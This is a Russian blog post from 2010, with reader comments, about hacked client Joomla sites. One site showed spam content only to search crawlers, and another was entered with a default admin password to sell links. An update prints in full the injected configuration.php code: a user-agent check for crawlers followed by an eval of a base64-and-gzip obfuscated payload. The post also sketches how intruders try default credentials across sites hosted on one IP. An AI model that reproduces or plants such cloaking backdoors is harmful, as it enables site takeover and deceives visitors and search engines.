1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...

Странный взлом клиентских сайтов

Хакеры не дремлют! :) И каждый день придумывают всё новые и новые способы взлома ваших (и наших…) сайтов. Как я уже когда когда-то упоминал, помимо собственных сайтов я так же занимаюсь продвижением клиентских сайтов, и на днях с клиентскими сайтами произошло пару интересных случаев…

взлом сайта

В начале месяца я, как всегда, полез мониторить клиентские позиции и на паре сайтов заметил огромное падение позиций в Гугле. Начал копать… Залез в кеш гугла и на тебе:

странный взлом

При том, что в Яндексе все нормально! А второй сайт, который так же просел в Гугле, имеет совершенно нормальный кеш…

То есть – адреса страниц правильные, реально существующие. Title иногда тот, что нужен, а иногда то же поменянный, наравне с контентом. Контент – не с этого сайта, сайт на русском, коммерческий. Иду на сайт – нет там такого! Иду файлы смотреть – индексы, шаблоны, htaccess – всё то, что и было, ничего не поменяно. Лезу в базу – то же всё как надо. Пишу в саппорт хостинга, отвечают что такого контента в моих файлах нет (а то я не знаю ;) ), про возможность взлома молчат, советуют обратиться в саппорт Гугла(!)… Поспрашивал на форумах – ни кто не знает куда копать и как от этой заразы избавиться…

Может, кто-то из читателей подскажет решение? Двиг на сайте joomla 1.0.*

И второй случай – вчера закупаюсь ссылками в ГГЛ, ищу сайты из ЯК нужной тематики (для покупки ссылок) и тут на тебе – вылазит сайт,  который я продвигаю другому своему клиенту! Сразу же отзваниюсь, говорят – не в курсе, даже не знают что такое биржа… Интересно :) . Ну, думаю, поломали…

Немного лирики:

Многие студии по созданию сайтов арендуют сервер/vds под размещение сайтов клиентов. После создания сайта он заливается именно туда с дефолтным логином/паролем от админки… Так как, как правило, все такие сайты висят на одном ip, то вычислить, какие там есть сайты не представляет труда… Далее открываем у каждого сайта страницу входа в админку и пробуем дефолтный логин/пароль… Поверьте, далеко не все владельцы сайтов после получения к ним доступа задумываются о смене пароля :) .

В общем, думаю всем понятно как этот сайт «поломали». В итоге, звоню хозяевам сайта, прошу сменить пароль, пишу саппорту ГГЛа:

Здравствуйте!
Я продвигаю сайт http://*****.ru/ и был очень удивлен когда нашел его в вашей бирже, торгующим ссылками. Хозяева об этом ничего не знают (не в курсе, что там ссылки продаются). Завтра я сменю пароль от админки и удалю все ссылки, так что лучше заморозьте деньги на счету продавца.

На что получаю лаконичный ответ:

Администратор
06.07.2010 17:28
Не могли бы вы в доказательства управления сайтом на главной странице разместить в мета-теге слово «Интернет»?

А оно мне надо?? Сегодня снес все проданные изобретательным товарищем ссылки (а напродавать он успел много, штук 40-50), чувствую, не получит он свои денюжки (трехмесячный холд).

В общем, берегите свои сайты, меняйте пароли и не делайте их легкими! Буду благодарен за ответ на вопрос из первой части поста.

Добавлено 12.07.2010:

Спасибо товарищу Crio за подсказку сменить свой юзер агент на Googlebot, в итоге выдалась ошибка:

Error: headers already sent in configuration.php(80) : eval()’d code(1) : eval()’d code(1) : eval()’d code on line 1.
Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)
URL=http://www.*****.ruoption=com_frontpage&Itemid=55:
OPTION=com_frontpage:

Полез в  configuration.php а зараза именно там :) :

Error_Reporting(E_ERROR);
$u=strtolower($_SERVER["HTTP_USER_AGENT"]);
if (strstr($u,»crawler»)or strstr($u,»googlebot»)or strstr($u,»msnbot»)or strstr($u,»yahoo»)or strstr($u,»search»)or strstr($u,»bing»)or strstr($u,»indexer»)or strstr($u,»cuill.com»)or strstr($u,»clushbot»))
{eval(gzinflate(base64_decode(‘FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==’)));};

Потер её, всё заработало!

Постовые:  Новости славного города Челябинск – оперативно и интересно!

Спасибо за ретвит этой записи, если вам понравился материал, подпишитесь на обновления блога по RSS или по почте:

Читать в Яндекс.Ленте Добавить в Google Reader
1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...

Рекомендую прочесть

  • http://dnx.su/ Lis`ена

    Спасибо за информацию!

  • krek

    По первому случаю взлома – это доры залили на фтп… а потом удалили. Логично было бы сменить пароли. ( ну это конечно если еще не сменил)

    • http://antonblog.ru Антон

      дык, уже конечно, спасибо за инфу!

  • http://altlist.ru/ Альтернатива

    Спасибо за инфу… блин я как представлю что мой СДЛьчик ломанут, так плохо становится. Пойду ка я пароли поменяю

  • http://seo-maxi.ru seo-maxi.ru

    Ye и умники эти хакеры :)

  • http://crio.pp.ua Crio

    Скорее всего никто ничего не заливал на сайт, иначе бы этот контент вы бы увидели. Тут похоже что именно поисковику гугла подсунут другой контент(по HTTP_USER_AGENT определялся поисковик гугл и ему мог передавался контент с другого сайта). Мне однажды попался такой код, был он правда в шаблоне вордпреса и был закодирован, возможно тут аналогичная ситуация.

    • http://antonblog.ru Антон

      да нет, шаблоны все те же, что и были

      • http://crio.pp.ua Crio

        Такой код может быть не только в шаблоне, возможно в каком-то плагине. Злоумышленник мог также внедрить этот код куда угодно на сайт, если смог получить доступ, так что то что ничего не менялось, еще не говорит что все чисто. Можно попробовать просмотреть сайт глазами гуглобота поменяв свой HTTP_USER_AGENT, помойму под фаерфокс есть плагины, точно не подскажу.

        • http://antonblog.ru Антон

          спасибо, про user agent не додумался))

  • http://nemcd.com Antonio

    Интересный триллер по поиску заразы.
    Хорошо что нашли ее все-таки.

Подпишись на RSS Следите за обновлениями в Twitter!
ВверхВверх

MAXCACHE: 0.86MB/0.00039 sec